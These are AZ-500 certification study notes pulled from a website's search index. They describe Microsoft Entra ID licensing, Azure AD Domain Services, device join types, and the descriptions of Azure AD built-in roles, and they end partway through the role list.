        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        100 questions you should pass for the AZ-500 certificate

        Azure Active Directory\u00a0(Azure AD) is a cloud-based identity and access management service.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#1-microsoft-entra-id","title":"1. Microsoft Entra ID","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#11-microsoft-entra-id-licenses","title":"1.1. Microsoft Entra ID licenses","text":"
        • Azure Active Directory Free.\u00a0Provides user and group management, on-premises directory synchronization, basic reports, self-service password change for cloud users, and single sign-on across Azure, Microsoft 365, and many popular SaaS apps.
        • Azure Active Directory Premium P1.\u00a0In addition to the Free features, P1 lets your hybrid users access both on-premises and cloud resources. It also supports advanced administration, such as dynamic groups, self-service group management, Microsoft Identity Manager, and cloud write-back capabilities, which allow self-service password reset for your on-premises users.
        • Azure Active Directory Premium P2.\u00a0In addition to the Free and P1 features, P2 also offers Azure Active Directory Identity Protection to help provide risk-based Conditional Access to your apps and critical company data and Privileged Identity Management to help discover, restrict, and monitor administrators and their access to resources and to provide just-in-time access when needed.
        • \"Pay as you go\"\u00a0feature licenses. You also get additional feature licenses, such as Azure Active Directory Business-to-Customer (B2C). B2C can help you provide identity and access management solutions for your customer-facing apps.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#12-azure-active-directory-domain-services-azure-ad-ds","title":"1.2. Azure Active Directory Domain Services (Azure AD DS)","text":"

        There are\u00a0two ways\u00a0to provide Active Directory Domain Services in the cloud:

        • A\u00a0managed domain\u00a0that you create using Azure Active Directory Domain Services (Azure AD DS). Microsoft creates and manages the required resources. Azure AD DS \u00a0deploys, manages, patches, and secures the active directory domain service infrastructure for you. It's a managed domain experience. Azure AD DS provides a smaller subset of features to traditional self-managed AD DS environment, which reduces some of the design and management complexity. For example, there are no AD forests, domains, sites, and replication links to design and maintain. Also it guarantees access to traditional authentication mechanisms such as Kerberos or NTLM.
        • A\u00a0self-managed\u00a0domain that you create and configure using traditional resources such as virtual machines (VMs), Windows Server guest OS, and Active Directory Domain Services (AD DS). You then continue to administer these resources. You're then able to do additional tasks, such as extending the schema or create forest trust. Common deployment models in a self-managed domain are:
          • Standalone cloud-only AD DS: Azure VMs are configured as domain controllers, and a separate, cloud-only AD DS environment is created. This AD DS environment doesn't integrate with an on-premises AD DS environment. A different set of credentials is used to sign in and administer VMs in the cloud.
          • Resource forest deployment\u00a0- Azure VMs are configured as domain controllers, and an AD DS domain that's part of an existing forest is created. A trust relationship is then configured to an on-premises AD DS environment. Other Azure VMs can domain-join this resource forest in the cloud. User authentication runs over a VPN / ExpressRoute connection to the on-premises AD DS environment.
          • Extend on-premises domain to Azure\u00a0- An Azure virtual network connects to an on-premises network using a VPN / ExpressRoute connection. Azure VMs connect to this Azure virtual network, which lets them domain-join to the on-premises AD DS environment. An alternative is to create Azure VMs and promote them as replica domain controllers from the on-premises AD DS domain. These domain controllers replicate over a VPN / ExpressRoute connection to the on-premises AD DS environment. The on-premises AD DS domain is effectively extended into Azure.

        The following table outlines some of the features you may need for your organization and the differences between a managed Azure AD DS domain or a self-managed AD DS domain:

        Feature Azure Active Directory Services (Azure AD DS) Self-managed AD DS Managed service \u2713 \u2715 Secure deployments \u2713 The administrator secures the deployment Domain Name System (DNS) server \u2713 (managed service) \u2713 Domain or Enterprise administrator privileges \u2715 \u2713 Domain join \u2713 \u2713 Domain authentication using New Technology LAN Manager (NTLM) and Kerberos \u2713 \u2713 Kerberos constrained delegation Resource-based Resource-based & account-based Custom organizational unit (OU) structure \u2713 \u2713 Group Policy \u2713 \u2713 Schema extensions \u2715 \u2713 Active Directory domain/forest trusts \u2713 (one-way outbound forest trusts only) \u2713 Secure Lightweight Directory Access Protocols (LDAPs) \u2713 \u2713 Lightweight Directory Access Protocol (LDAP) read \u2713 \u2713 Lightweight Directory Access Protocol (LDAP) write \u2713 (within the managed domain) \u2713 Geographical-distributed (Geo-distributed) deployments \u2713 \u2713

        Azure Active Directory Domain Services (Azure AD DS) provides managed domain services such as domain join, group policy, lightweight directory access protocol (LDAP), and Kerberos/New Technology LAN Manager (NTLM) authentication. You use these domain services without the need to deploy, manage, and patch domain controllers (DCs) in the cloud.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#13-signing-devices-to-azure-active-directory","title":"1.3. Signing devices to Azure Active Directory","text":"

        Azure AD lets you manage the identity of devices used by the organization and control access to corporate resources from those devices. Users can also register their personal device (a bring-your-own (BYO) model) with Azure AD, which provides the device with an identity. Azure AD then authenticates the device when a user signs in to Azure AD and uses the device to access secured resources. The device can be managed using Mobile Device Management (MDM) software like Microsoft Intune. This management ability lets you restrict access to sensitive resources to managed and policy-compliant devices.

        Azure AD joined devices give you the following benefits:

        • Single sign-on (SSO) to applications secured by Azure AD.
        • Enterprise policy-compliant roaming of user settings across devices.
        • Access to the Windows Store for Business using corporate credentials.
        • Windows Hello for Business.
        • Restricted access to apps and resources from devices compliant with corporate policy.

        The following table outlines common device ownership models and how they would typically be joined to a domain:

        Type of device Device platforms Mechanism Personal devices Windows 10, iOS, Android, macOS Azure AD registered Organization-owned device not joined to on-premises AD DS Windows 10 Azure AD joined Organization-owned device joined to an on-premises AD DS Windows 10 Hybrid Azure AD joined

        The following table outlines differences in how the devices are represented and can authenticate themselves against the directory:

        Aspect Azure AD-joined Azure AD DS-joined Device controlled by Azure AD Azure AD Domain Services managed domain Representation in the directory Device objects in the Azure AD directory Computer objects in the Azure AD DS managed domain Authentication Open Authorization OAuth / OpenID Connect-based protocols. These protocols are designed to work over the internet, so are great for mobile scenarios where users access corporate resources from anywher Kerberos and NTLM protocols, so it can support legacy applications migrated to run on Azure VMs as part of a lift-and-shift strategy Management Mobile Device Management (MDM) software like Intune Group Policy Networking Works over the internet Must be connected to, or peered with, the virtual network where the managed domain is deployed Great for... End-user mobile or desktop devices Server VMs deployed in Azure

        If on-premises AD DS and Azure AD are configured for federated authentication using Active Directory Federation Services (ADFS), then there's no (current/valid) password hash available in Azure DS. Azure AD user accounts created before fed auth was implemented might have an old password hash that doesn't match a hash of their on-premises password. Hence Azure AD DS won't validate the user's credentials.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#14-roles-in-azure-active-directory","title":"1.4. Roles in Azure Active Directory","text":"

        Azure AD built-in roles differ in where they can be used, which fall into the following\u00a0three broad categories.

        1. Azure AD-specific roles: These roles grant permissions to manage resources within Azure AD only. For example,\u00a0User Administrator,\u00a0Application Administrator, and\u00a0Groups Administrator\u00a0all grant permissions to manage resources that live in Azure AD.
        2. Service-specific roles: For major Microsoft 365 services (non-Azure AD), we have built service-specific roles that grant permissions to manage all features within the service.
        3. Cross-service roles: There are some roles that span services. We have two global roles - Global Administrator and Global Reader. All Microsoft 365 services honor these two roles. Also, there are some security-related roles like Security Administrator and Security Reader that grant access across multiple security services within Microsoft 365.\u00a0For example, using Security Administrator roles in Azure AD, you can manage Microsoft 365 Defender portal, Microsoft Defender Advanced Threat Protection, and Microsoft Defender for Cloud Apps.

        The following table is offered as an aid to understanding these role categories. The categories are named arbitrarily and aren't intended to imply any other capabilities beyond the documented Azure AD role permissions.

        Category Role Azure AD-specific roles Application Administrator Application Developer Authentication Administrator Business to consumer (B2C) Identity Experience Framework (IEF) Keyset Administrator Business to consumer (B2C) Identity Experience Framework (IEF) Policy Administrator Cloud Application Administrator Cloud Device Administrator Conditional Access Administrator Device Administrators Directory Readers Directory Synchronization Accounts Directory Writers External ID User Flow Administrator External ID User Flow Attribute Administrator External Identity Provider Administrator Groups Administrator Guest Inviter Helpdesk Administrator Hybrid Identity Administrator License Administrator Partner Tier1 Support Partner Tier2 Support Password Administrator Privileged Authentication Administrator Privileged Role Administrator Reports Reader User Administrator Cross-service roles Global Administrator Compliance Administrator Compliance Data Administrator Global Reader Security Administrator Security Operator Security Reader Service Support Administrator Service-specific roles Azure DevOps Administrator Azure Information Protection Administrator Billing Administrator Customer relationship management (CRM) Service Administrator Customer Lockbox Access Approver Desktop Analytics Administrator Exchange Service Administrator Insights Administrator Insights Business Leader Intune Service Administrator Kaizala Administrator Lync Service Administrator Message Center Privacy Reader Message Center Reader Modern Commerce User Network Administrator Office Apps Administrator Power BI Service Administrator Power Platform Administrator Printer Administrator Printer Technician Search Administrator Search Editor SharePoint Service Administrator Teams Communications Administrator Teams Communications Support Engineer Teams Communications Support Specialist Teams Devices Administrator Teams Administrator

        These are all of the Azure AD built-in roles:

        Role Description Application Administrator Users in this role can create and manage all aspects of enterprise applications, application registrations, and application proxy settings. Users assigned to this role aren't added as owners when creating new application registrations or enterprise applications. This role also grants the ability to consent for delegated permissions and application permissions, except for application permissions for Microsoft Graph. Application Developer Can create application registrations when the\u00a0Users can register applications\u00a0setting is set to No. Attack Payload Author Users in this role can create attack payloads but not actually launch or schedule them. Attack payloads are then available to all administrators in the tenant, who can use them to create a simulation. Attack Simulation Administrator Users in this role can create and manage all aspects of attack simulation creation, launch/scheduling of a simulation, and the review of simulation results. Members of this role have this access for all simulations in the tenant. Attribute Assignment Administrator Users with this role can assign and remove custom security attribute keys and values for supported Azure AD objects such as users, service principals, and devices. By default, Global Administrator and other administrator roles don't have permissions to read, define, or assign custom security attributes. To work with custom security attributes, you must be assigned one of the custom security attribute roles. Attribute Assignment Reader Users with this role can read custom security attribute keys and values for supported Azure AD objects. By default, Global Administrator and other administrator roles don't have permissions to read, define, or assign custom security attributes. You must be assigned one of the custom security attribute roles to work with custom security attributes. Attribute Definition Administrator Users with this role can define a valid set of custom security attributes that can be assigned to supported Azure AD objects. This role can also activate and deactivate custom security attributes. By default, Global Administrator and other administrator roles don't have permissions to read, define, or assign custom security attributes. To work with custom security attributes, you must be assigned one of the custom security attribute roles. Authentication Administrator Assign the Authentication Administrator role to users who need to do the following: -Set or reset any authentication method (including passwords) for nonadministrators and some roles. -Require users who are nonadministrators or assigned to some roles to re-register against existing nonpassword credentials (for example,\u00a0Multifactor authentication (MFA)\u00a0or\u00a0Fast ID Online (FIDO), and can also revoke remember MFA on the device, which prompts for MFA on the next sign-in. -Perform sensitive actions for some users. -Create and manage support tickets in Azure and the Microsoft 365 admin center. Users with this role can't do the following tasks: -Can't change the credentials or reset MFA for members and owners of a role-assignable group. -Can't manage MFA settings in the legacy MFA management portal or Hardware OATH tokens. The same functions can be accomplished using the Set-MsolUser commandlet Azure AD PowerShell module. Authentication Policy Administrator Assign the Authentication Policy Administrator role to users who need to do the following: -Configure the authentication methods policy, tenant-wide MFA settings, and password protection policy that determine which methods each user can register and use. -Manage Password Protection settings: smart lockout configurations and updating the custom banned passwords list. -Create and manage verifiable credentials. -Create and manage Azure support tickets. Users with this role can't do the following tasks: -Can't update sensitive properties. -Can't delete or restore users. -Can't manage MFA settings in the legacy MFA management portal or Hardware OATH tokens. Azure AD Joined Device Local Administrator This role is available for assignment only as another local administrator in Device settings. Users with this role become local machine administrators on all Windows 10 devices that are joined to Azure Active Directory. They don't have the ability to manage device objects in Azure Active Directory. Azure DevOps Administrator Users with this role can manage all enterprise Azure DevOps policies applicable to all Azure DevOps organizations backed by the Azure AD. Users in this role can manage these policies by navigating to any Azure DevOps organization that is backed by the company's Azure AD. Users in this role can claim ownership of orphaned Azure DevOps organizations. This role grants no other Azure DevOps-specific permissions (for example, Project Collection Administrators) inside any of the Azure DevOps organizations backed by the company's Azure AD organization. Azure Information Protection Administrator Users with this role have all permissions in the Azure Information Protection service. This role allows configuring labels for the Azure Information Protection policy, managing protection templates, and activating protection. This role doesn't grant any permissions in Identity Protection Center, Privileged Identity Management, Monitor Microsoft 365 Service Health, or Office 365 Security and compliance center. Business-to-Consumer (B2C) Identity Experience Framework (IEF) Keyset Administrator Users can create and manage policy keys and secrets for token encryption, token signatures, and claim encryption/decryption. By adding new keys to existing key containers, this limited administrator can roll over secrets as needed without impacting existing applications. This user can see the full content of these secrets and their expiration dates even after their creation. Business-to-Consumer (B2C) Identity Experience Framework (IEF) Policy Administrator Users in this role have the ability to create, read, update, and delete all custom policies in Azure AD B2C and therefore have full control over the Identity Experience Framework in the relevant Azure AD B2C organization. By editing policies, this user can establish direct federation with external identity providers, change the directory schema, change all user-facing content HyperText Markup Language (HTML), Cascading Style Sheets (CSS), JavaScript), change the requirements to complete authentication, create new users, send user data to external systems including full migrations, and edit all user information including sensitive fields like passwords and phone numbers. Conversely, this role can't change the encryption keys or edit the secrets used for federation in the organization. Billing Administrator Makes purchases, manages subscriptions, manages support tickets, and monitors service health. Cloud App Security Administrator Users with this role have full permissions in Defender for Cloud Apps. They can add administrators, add Microsoft Defender for Cloud Apps policies and settings, upload logs, and perform governance actions. Cloud Application Administrator Users in this role have the same permissions as the Application Administrator role, excluding the ability to manage application proxy. This role grants the ability to create and manage all aspects of enterprise applications and application registrations. Users assigned to this role aren't added as owners when creating new application registrations or enterprise applications. This role also grants the ability to consent for delegated permissions and application permissions, except for application permissions for Microsoft Graph. Cloud Device Administrator Users in this role can enable, disable, and delete devices in Azure AD and read Windows 10 BitLocker keys (if present) in the Azure portal. The role doesn't grant permissions to manage any other properties on the device. Compliance Administrator Users with this role have permissions to manage compliance-related features in the Microsoft Purview compliance portal, Microsoft 365 admin center, Azure, and Office 365 Security and compliance center. Assignees can also manage all features within the Exchange admin center and create support tickets for Azure and Microsoft 365. Compliance Data Administrator Users with this role have permissions to track data in the Microsoft Purview compliance portal, Microsoft 365 admin center, and Azure. Users can also track compliance data within the Exchange admin center, Compliance Manager, and Teams and Skype for Business admin center and create support tickets for Azure and Microsoft 365. Conditional Access Administrator Users with this role have the ability to manage Azure Active Directory Conditional Access settings. Customer Lockbox Access Approver Manages Microsoft Purview Customer Lockbox requests in your organization. They receive email notifications for Customer Lockbox requests and can approve and deny requests from the Microsoft 365 admin center. They can also turn the Customer Lockbox feature on or off. Only Global Administrators can reset the passwords of people assigned to this role. Desktop Analytics Administrator Users in this role can manage the Desktop Analytics service, including viewing asset inventory, creating deployment plans, and viewing deployment and health status. Directory Readers Users in this role can read basic directory information. This role should be used for: -Granting a specific set of guest users read access instead of granting it to all guest users. -Granting a specific set of nonadmin users access to the Azure portal when \"Restrict access to Azure AD portal to admins only\" is set to \"Yes\". -Granting service principals access to the directory where Directory.Read.All isn't an option. Directory Synchronization Accounts Don't use. This role is automatically assigned to the Azure AD Connect service and isn't intended or supported for any other use. Directory Writers Users in this role can read and update basic information of users, groups, and service principals. Domain Name Administrator Users with this role can manage (read,\u00a0add,\u00a0verify,\u00a0update, and\u00a0delete) domain names. They can also read directory information about users, groups, and applications, as these objects possess domain dependencies. For on-premises environments, users with this role can configure domain names for federation so that associated users are always authenticated on-premises. These users can then sign into Azure AD-based services with their on-premises passwords via single sign-on. Federation settings need to be synced via Azure AD Connect so users also have permissions to manage Azure AD Connect. Dynamics 365 Administrator Users with this role have global permissions within Microsoft Dynamics 365 Online when the service is present, and the ability to manage support tickets and monitor service health. Edge Administrator Users in this role can create and manage the enterprise site list required for Internet Explorer mode on Microsoft Edge. This role grants permissions to create, edit, and publish the site list and additionally allows access to manage support tickets. Exchange Administrator Users with this role have global permissions within Microsoft Exchange Online, when the service is present. Also has the ability to create and manage all Microsoft 365 groups, manage support tickets, and monitor service health. Exchange Recipient Administrator Users with this role have read access to recipients and write access to the attributes of those recipients in Exchange Online. External ID User Flow Administrator Users with this role can create and manage user flows (also called \"built-in\" policies) in the Azure portal. These users can customize HTML/CSS/JavaScript content, change MFA requirements, select claims in the token, manage API connectors and their credentials, and configure session settings for all user flows in the Azure AD organization. On the other hand, this role doesn't include the ability to review user data or make changes to the attributes that are included in the organization schema. Changes to Identity Experience Framework policies (also known as custom policies) are also outside the scope of this role. External ID User Flow Attribute Administrator Users with this role add or delete custom attributes available to all user flows in the Azure AD organization. Users with this role can change or add new elements to the end-user schema and impact the behavior of all user flows, and indirectly result in changes to what data may be asked of end users and ultimately sent as claims to applications. This role can't edit user flows. External Identity Provider Administrator This administrator manages federation between Azure AD organizations and external identity providers. With this role, users can add new identity providers and configure all available settings (for example, authentication path, service ID, assigned key containers). This user can enable the Azure AD organization to trust authentications from external identity providers. The resulting impact on end-user experiences depends on the type of organization: -Azure AD organizations for employees and partners: The addition of a federation (for example, with Gmail) immediately impacts all guest invitations not yet redeemed. See Adding Google as an identity provider for B2B guest users. -Azure Active Directory B2C organizations: The addition of a federation (for example, with Facebook, or with another Azure AD organization) doesn't immediately impact end-user flows until the identity provider is added as an option in a user flow (also called a built-in policy). Global Administrator Users with this role have access to all administrative features in Azure Active Directory, and services that use Azure Active Directory identities like the Microsoft 365 Defender portal, the Microsoft Purview compliance portal, Exchange Online, SharePoint Online, and Skype for Business Online. Furthermore, Global Administrators can elevate their access to manage all Azure subscriptions and management groups. This allows Global Administrators to get full access to all Azure resources using the respective Azure AD Tenant. The person who signs up for the Azure AD organization becomes a Global Administrator. There can be more than one Global Administrator at your company. Global Administrators can reset the password for any user and all other administrators. Global Administrator As a best practice, Microsoft recommends that you assign the Global Administrator role to\u00a0fewer than five people\u00a0in your organization. Global Reader Users in this role can read settings and administrative information across Microsoft 365 services but can't take management actions. Global Reader is the read-only counterpart to Global Administrator. Assign Global Reader instead of Global Administrator for planning, audits, or investigations. Use Global Reader in combination with other limited admin roles like Exchange Administrator to make it easier to get work done without the assigning the Global Administrator role. Global Reader works with Microsoft 365 admin center, Exchange admin center, SharePoint admin center, Teams admin center, Security center, compliance center, Azure AD admin center, and Device Management admin center. Users with this role can't do the following tasks: -Can't access the Purchase Services area in the Microsoft 365 admin center. Groups Administrator Users in this role can create/manage groups and its settings like naming and expiration policies. It's important to understand that assigning a user to this role gives them the ability to manage all groups in the organization across various workloads like Teams, SharePoint, Yammer in addition to Outlook. Also the user is able to manage the various groups settings across various admin portals like Microsoft admin center, Azure portal, and workload specific ones like Teams and SharePoint admin centers. Guest Inviter Users in this role can manage Azure Active Directory B2B guest user invitations when the Members can invite user setting is set to\u00a0No. Helpdesk Administrator Users with this role can change passwords, invalidate refresh tokens, create and manage support requests with Microsoft for Azure and Microsoft 365 services, and monitor service health. Invalidating a refresh token forces the user to sign in again. Whether a Helpdesk Administrator can reset a user's password and invalidate refresh tokens depends on the role the user is assigned. Users with this role\u00a0can't\u00a0do the following: -Can't change the credentials or reset MFA for members and owners of a\u00a0role-assignable group. Hybrid Identity Administrator Users in this role can create, manage and deploy provisioning configuration setup from AD to Azure AD using Cloud Provisioning and manage Azure AD Connect, Pass-through Authentication (PTA), Password hash synchronization (PHS), Seamless single sign-on (Seamless SSO), and federation settings. Users can also troubleshoot and monitor logs using this role. Identity Governance Administrator Users with this role can manage Azure AD identity governance configuration, including access packages, access reviews, catalogs and policies, ensuring access is approved and reviewed and guest users who no longer need access are removed. Insights Administrator Users in this role can access the full set of administrative capabilities in the Microsoft Viva Insights app. This role has the ability to read directory information, monitor service health, file support tickets, and access the Insights Administrator settings aspects. Insights Analyst Assign the Insights Analyst role to users who need to do the following tasks: -Analyze data in the Microsoft Viva Insights app, but can't manage any configuration settings -Create, manage, and run queries -View basic settings and reports in the Microsoft 365 admin center -Create and manage service requests in the Microsoft 365 admin center Insights Business Leader Users in this role can access a set of dashboards and insights via the Microsoft Viva Insights app. This includes full access to all dashboards and presented insights and data exploration functionality. Users in this role don't have access to product configuration settings, which is the responsibility of the Insights Administrator role. Intune Administrator Users with this role have global permissions within Microsoft Intune Online, when the service is present. Additionally, this role contains the ability to manage users and devices to associate policy and create and manage groups. This role can create and manage all security groups. However, Intune Administrator doesn't have admin rights over Office groups. That means the admin can't update owners or memberships of all Office groups in the organization. However, you can manage the Office group that's created, which comes as a part of end-user privileges. So, any Office group (not security group) that you create should be counted against your quota of 250. Kaizala Administrator Users with this role have global permissions to manage settings within Microsoft Kaizala, when the service is present and the ability to manage support tickets and monitor service health. Additionally, the user can access reports related to adoption and usage of Kaizala by Organization members and business reports generated using the Kaizala actions. Knowledge Administrator Users in this role have full access to all knowledge, learning and intelligent features settings in the Microsoft 365 admin center. They have a general understanding of the suite of products, licensing details and have responsibility to control access. Knowledge Administrator can create and manage content, like topics, acronyms and learning resources. Additionally, these users can create content centers, monitor service health, and create service requests. Knowledge Manager Users in this role can create and manage content, like topics, acronyms and learning content. These users are primarily responsible for the quality and structure of knowledge. This user has full rights to topic management actions to confirm a topic, approve edits, or delete a topic. This role can also manage taxonomies as part of the term store management tool and create content centers. License Administrator Users in this role can add, remove, and update license assignments on users, groups (using group-based licensing), and manage the usage location on users. The role doesn't grant the ability to purchase or manage subscriptions, create or manage groups, or create or manage users beyond the usage location. This role has no access to view, create, or manage support tickets. Lifecycle Workflows Administrator Assign the Lifecycle Workflows Administrator role to users who need to do the following tasks: -Create and manage all aspects of workflows and tasks associated with Lifecycle Workflows in Azure AD -Check the execution of scheduled workflows -Launch on-demand workflow runs -Inspect workflow execution logs Message Center Privacy Reader Users in this role can monitor all notifications in the Message Center, including data privacy messages. Message Center Privacy Readers get email notifications including those related to data privacy and they can unsubscribe using Message Center Preferences. Only the Global Administrator and the Message Center Privacy Reader can read data privacy messages. Additionally, this role contains the ability to view groups, domains, and subscriptions. This role has no permission to view, create, or manage service requests. Message Center Reader Users in this role can monitor notifications and advisory health updates in Message center for their organization on configured services such as Exchange, Intune, and Microsoft Teams. Message Center Readers receive weekly email digests of posts, updates, and can share message center posts in Microsoft 365. In Azure AD, users assigned to this role will only have read-only access on Azure AD services such as users and groups. This role has no access to view, create, or manage support tickets. Microsoft Hardware Warranty Administrator Assign the Microsoft Hardware Warranty Administrator role to users who need to do the following tasks: -Create new warranty claims for Microsoft manufactured hardware, like Surface and HoloLens -Search and read opened or closed warranty claims -Search and read warranty claims by serial number -Create, read, update, and delete shipping addresses -Read shipping status for open warranty claims -Create and manage service requests in the Microsoft 365 admin center -Read Message center announcements in the Microsoft 365 admin center Microsoft Hardware Warranty Specialist Assign the Microsoft Hardware Warranty Specialist role to users who need to do the following tasks: -Create new warranty claims for Microsoft manufactured hardware, like Surface and HoloLens -Read warranty claims that they created -Read and update existing shipping addresses -Read shipping status for open warranty claims they created -Create and manage service requests in the Microsoft 365 admin center Modern Commerce User Don't use. This role is automatically assigned from Commerce, and isn't intended or supported for any other use. The Modern Commerce User role gives certain users permission to access Microsoft 365 admin center and see the left navigation entries for Home, Billing, and Support. The content available in these areas is controlled by commerce-specific roles assigned to users to manage products that they bought for themselves or your organization. This might include tasks like paying bills, or for access to billing accounts and billing profiles. Users with the Modern Commerce User role typically have administrative permissions in other Microsoft purchasing systems, but don't have Global Administrator or Billing Administrator roles used to access the admin center. Network Administrator Users in this role can review network perimeter architecture recommendations from Microsoft that are based on network telemetry from their user locations. Network performance for Microsoft 365 relies on careful enterprise customer network perimeter architecture, which is generally user location specific. This role allows for editing of discovered user locations and configuration of network parameters for those locations to facilitate improved telemetry measurements and design recommendations Office Apps Administrator Users in this role can manage Microsoft 365 apps' cloud settings. This includes managing cloud policies, self-service download management and the ability to view Office apps related report. This role additionally grants the ability to manage support tickets, and monitor service health within the main admin center. Users assigned to this role can also manage communication of new features in Office apps. Organizational Messages Writer Assign the Organizational Messages Writer role to users who need to do the following tasks: -Write,\u00a0publish, and\u00a0delete\u00a0organizational messages using Microsoft 365 admin center or Microsoft Endpoint Manager -Manage\u00a0organizational message delivery options using Microsoft 365 admin center or Microsoft Endpoint Manager -Read\u00a0organizational message delivery results using Microsoft 365 admin center or Microsoft Endpoint Manager -View\u00a0usage reports and most settings in the Microsoft 365 admin center, but can't make changes Partner Tier1 Support Don't use. This role has been deprecated and will be removed from Azure AD in the future. This role is intended for use by a few Microsoft resale partners, and isn't intended for general use. Partner Tier2 Support Don't use. This role has been deprecated and will be removed from Azure AD in the future. This role is intended for use by a few Microsoft resale partners, and isn't intended for general use. Password Administrator Users with this role have limited ability to manage passwords. This role doesn't grant the ability to manage service requests or monitor service health. Whether a Password Administrator can reset a user's password depends on the role the user is assigned.Users with this role\u00a0can't\u00a0do the following tasks: -Can't change the credentials or reset MFA for members and owners of a role-assignable group. Permissions Management Administrator Assign the Permissions Management Administrator role to users who need to do the following tasks: -Manage\u00a0all aspects of Entra Permissions Management, when the service is present Power Business Intelligence (BI) Administrator Users with this role have global permissions within Microsoft Power BI, when the service is present and the ability to manage support tickets and monitor service health. Power Platform Administrator Users in this role can create and manage all aspects of environments, Power Apps, Flows, Data Loss Prevention policies. Additionally, users with this role have the ability to manage support tickets and monitor service health. Printer Administrator Users in this role can register printers and manage all aspects of all printer configurations in the Microsoft Universal Print solution, including the Universal Print Connector settings. They can consent to all delegated print permission requests. Printer Administrators also have access to print reports. Printer Technician Users with this role can register printers and manage printer status in the Microsoft Universal Print solution. They can also read all connector information. Key task a Printer Technician can't do is set user permissions on printers and sharing printers. Privileged Authentication Administrator Assign the Privileged Authentication Administrator role to users who need to do the following tasks: -Set\u00a0or\u00a0reset\u00a0any authentication method (including passwords) for any user, including Global Administrators. -Delete\u00a0or\u00a0restore\u00a0any users, including Global Administrators. For more information, see Who can perform sensitive actions. -Force users to re-register against existing nonpassword credential (such as MFA or FIDO) and revoke remember MFA on the device, prompting for MFA on the next sign-in of all users. -Update\u00a0sensitive properties for all users. For more information, see Who can perform sensitive actions. -Create\u00a0and\u00a0manage\u00a0support tickets in Azure and the Microsoft 365 admin center. Users with this role can't do the following tasks: -Can't manage per-user MFA in the legacy MFA management portal. The same functions can be accomplished using the Set-MsolUser commandlet Azure AD PowerShell module. Privileged Role Administrator Users with this role can manage role assignments in Azure Active Directory and within Azure AD Privileged Identity Management. They can create and manage groups that can be assigned to Azure AD roles. In addition, this role allows management of all aspects of Privileged Identity Management and administrative units. Privileged Role Administrator This role grants the ability to manage assignments for all Azure AD roles including the Global Administrator role. This role doesn't include any other privileged abilities in Azure AD like creating or updating users. However, users assigned to this role can grant themselves or others another privilege by assigning extra roles. Reports Reader Users with this role can view usage reporting data and the reports dashboard in Microsoft 365 admin center and the adoption context pack in Power Business Intelligence (Power BI). Additionally, the role provides access to all sign-in logs, audit logs, and activity reports in Azure AD and data returned by the Microsoft Graph reporting API. A user assigned to the Reports Reader role can access only relevant usage and adoption metrics. They don't have any admin permissions to configure settings or access the product-specific admin centers like Exchange. This role has no access to view, create, or manage support tickets. Search Administrator Users in this role have full access to all Microsoft Search management features in the Microsoft 365 admin center. Additionally, these users can view the message center, monitor service health, and create service requests. Search Editor Users in this role can create, manage, and delete content for Microsoft Search in the Microsoft 365 admin center, including bookmarks, questions and answers, and locations. Security Administrator Users with this role have permissions to manage security-related features in the Microsoft 365 Defender portal, Azure Active Directory Identity Protection, Azure Active Directory Authentication, Azure Information Protection, and Office 365 Security and compliance center. Security Operator Users with this role can manage alerts and have global read-only access on security-related features, including all information in Microsoft 365 security center, Azure Active Directory, Identity Protection, Privileged Identity Management and Office 365 Security & compliance center. Security Reader Users with this role have global read-only access on security-related feature, including all information in Microsoft 365 security center, Azure Active Directory, Identity Protection, Privileged Identity Management, and the ability to read Azure Active Directory sign-in reports and audit logs, and in Office 365 Security and compliance center. Service Support Administrator Users with this role can create and manage support requests with Microsoft for Azure and Microsoft 365 services, and view the service dashboard and message center in the Azure portal and Microsoft 365 admin center. SharePoint Administrator Users with this role have global permissions within Microsoft SharePoint Online, when the service is present, and the ability to create and manage all Microsoft 365 groups, manage support tickets, and monitor service health. Skype for Business Administrator Users with this role have global permissions within Microsoft Skype for Business, when the service is present, and manage Skype-specific user attributes in Azure Active Directory. Additionally, this role grants the ability to manage support tickets and monitor service health, and to access the Teams and Skype for Business admin center. The account must also be licensed for Teams or it can't run Teams PowerShell cmdlets. Teams Administrator Users in this role can manage all aspects of the Microsoft Teams workload via the Microsoft Teams and Skype for Business admin center and the respective PowerShell modules. This includes, among other areas, all management tools related to telephony, messaging, meetings, and the teams themselves. This role additionally grants the ability to create and manage all Microsoft 365 groups, manage support tickets, and monitor service health. Teams Communications Administrator Users in this role can manage aspects of the Microsoft Teams workload related to voice and telephony. This includes the management tools for telephone number assignment, voice and meeting policies, and full access to the call analytics toolset. Teams Communications Support Engineer Users in this role can troubleshoot communication issues within Microsoft Teams and Skype for Business using the user call troubleshooting tools in the Microsoft Teams and Skype for Business admin center. Users in this role can view full call record information for all participants involved. This role has no access to view, create, or manage support tickets. Teams Communications Support Specialist Users in this role can troubleshoot communication issues within Microsoft Teams and Skype for Business using the user call troubleshooting tools in the Microsoft Teams and Skype for Business admin center. Users in this role can only view user details in the call for the specific user they've looked up. This role has no access to view, create, or manage support tickets. Teams Devices Administrator Users with this role can manage Teams-certified devices from the Teams admin center. This role allows viewing all devices at single glance, with ability to search and filter devices. The user can check details of each device including logged-in account, make and model of the device. The user can change the settings on the device and update the software versions. This role doesn't grant permissions to check Teams activity and call quality of the device. Tenant Creator Assign the Tenant Creator role to users who need to do the following tasks: -Create\u00a0both Azure Active Directory and Azure Active Directory B2C tenants even if the tenant creation toggle is turned off in the user settings Usage Summary Reports Reader Users with this role can access tenant level aggregated data and associated insights in Microsoft 365 admin center for Usage and Productivity Score but can't access any user level details or insights. In Microsoft 365 admin center for the two reports, we differentiate between tenant level aggregated data and user level details. This role gives an extra layer of protection on individual user identifiable data, which was requested by both customers and legal teams. User Administrator Assign the User Administrator role to users who need to do the following tasks: -Create users -Update most user properties for all users, including all administrators -Update sensitive properties (including user principal name) for some users -Disable or enable some users -Delete or restore some users -Create and manage user views -Create and manage all groups -Assign licenses for all users, including all administrators -Reset passwords -Invalidate refresh tokens -Update 